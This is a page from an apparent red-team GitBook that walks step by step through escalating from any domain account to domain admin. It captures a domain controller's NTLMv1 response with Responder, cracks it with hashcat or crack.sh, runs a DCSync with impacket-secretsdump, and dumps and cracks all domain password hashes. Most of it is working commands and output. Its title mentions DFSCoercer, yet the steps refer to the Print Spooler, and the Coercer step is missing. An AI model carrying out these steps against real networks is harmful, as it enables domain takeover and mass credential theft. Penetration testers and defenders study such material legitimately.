Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Attack Environment Setup
  • Step1: set responder challenge
  • Step2: Start Responder
  • Step3: Use Coercer to test and execute the attack
  • Step4: Machine hash obtained
  • Step5: Preparing the hash
  • Step 6: Cracking it or submit it to crack.sh
  • Cracking it online:
  • Hashcat:
  • Step7: NTLM hash obtained + secrets dump
  • Step8: Dump AD users
  • Step9: Password cracking
  • Resources

Was this helpful?

  1. Active Directory 101

From DFSCoercer to DA

PreviousPrintNightmareNextFuzzing and Web

Last updated 2 years ago

Was this helpful?

Attack Environment Setup

For the attack to be successful, there are (4) requirements:

  1. Any valid domain account credentials

  2. Network connectivity to the target SMB (Server Message Block) Service.

  3. The target host must be running the Print Spooler service

  4. The target host must be allowed to send NTLMv1 responses (cannot be set to enforce NTLMv2 responses)

To determine if NTLM responses can be sent, I will check secpol.msc at Security Settings\Local Policies\Security Options\Network security: LANManager authentication level. Vulnerable settings can be any of the following:

- Send LM& NTLM responses

- Send LM& NTLM – use NTLMv2 session security if negotiated

- SendNTLM responses only.

Step1: set responder challenge

First, ensure that Responder’s challenge is set to 1122334455667788 in Responder.conf:

Step2: Start Responder

sudo python3 /usr/share/responder/Responder.py -I eth0 -w --disable-ess --lm

--disabled-ess and --lm

This is because the captured hash is NTLMv1 with SSP(Security Support Provider), which changes the server challenge and is not quite ideal for the attack. We can use Responder’s LanMan downgrade flag to get a NTLMv1 hash without SSP.

Step3: Use Coercer to test and execute the attack

Before starting, we can use crackmapexec to test if the spooler service in enabled.

crackmapexec smb -u "" -p "" target_ip -M spooler

Step4: Machine hash obtained

Now that the DC’s NTLMv1 hash has been captured, it can be cracked back into a plain NTLM hash, compatible with pass-the-hash attacks.This can be done quickly by submitting NTHASH:<response>to crack.sh, which uses rainbow tables, or by manually reconstructing the NTLM hash from its DES elements using hashcat and EvilMog’s ntlmv1-multi tool (my hashcat rig with an NVIDIA 3090 takes around 16 days to brute-force the needed DES hashes).

Step5: Preparing the hash

python3 ntlmv1.py --ntlmv1 "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788"

Hashfield Split:
['hashcat', '', 'DUSTIN-5AA37877', '85D5BC2CE95161CD00000000000000000000000000000000', '892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
LM Response: 85D5BC2CE95161CD00000000000000000000000000000000
NT Response: 892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0
Client Challenge: 1122334455667788
SRV Challenge: b36d2b9a8607ea77

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000

To crack with hashcat create a file with the following contents:
892F905962F76D32:b36d2b9a8607ea77
3837F613F88DE27C:b36d2b9a8607ea77

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
$NETLM$b36d2b9a8607ea77$892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0

Step 6: Cracking it or submit it to crack.sh

Cracking it online:

Hashcat:

  1. Use this charset:

2. Create a file with the following content from step5:

892F905962F76D32:b36d2b9a8607ea77 >> 14000.hash
3837F613F88DE27C:b36d2b9a8607ea77 >> 14000.hash

3. Execute hashcat

.\hashcat.exe -m 14000 -a 3 -1 .\charsets\DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

Step7: NTLM hash obtained + secrets dump

After obtaining the cracked NTLM hash, we need to find out the target user. We can dump the domain users with ldapdump or bloodhound before. When a domain admin account is picked up, we just need to execute the following command (DSync attack):

 impacket-secretsdump -hashes :5###74f2###########dfd888b -just-dc-user target_username DOMAIM/MACHINE_NAME\$@10.20.2.2

The NTLM account of the domain admin can be obtained.

Step8: Dump AD users

impacket-secretsdump -just-dc-ntlm domain/user@10.0.0.6

Step9: Password cracking

python3 script_passwords.py hashes.txt cracked.txt

#!/usr/bin/env python

import sys

print("---start process---")

file_hashes = sys.argv[1]
file_cracked = sys.argv[2]

with open(file_hashes) as f:
    hashes = [line.rstrip() for line in f]

with open(file_cracked) as f:
    cracked = [line.rstrip() for line in f]

f = open("output.txt", "w")

for hash in hashes:
	for crack in cracked:
		a=crack.split(":")
		if a[0] in hash:
			f.write(crack)
			f.write("\n")
			
f.close()

The ouput.txt file is generated with all the NTLM hashes, including repetitions.

Finally, the top of passwords can be see:

cat output.txt | sort | uniq -c | sort -nr

Resources

LogoGitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.GitHub
LogoGitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.GitHub
LogoThe World's Fastest DES Crackercrack.sh
https://raw.githubusercontent.com/brannondorsey/naive-hashcat/master/hashcat-3.6.0/charsets/DES_full.charset
LogoCracking NETLM/NETNTLMv1 Authenticationcrack.sh
LogoGitHub - evilmog/ntlmv1-multi: NTLMv1 MultitoolGitHub
LogoNTLMv1 to NTLM Reversing
Logohttps://www.fortalicesolutions.com/posts/elevating-with-ntlmv1-and-the-printer-bug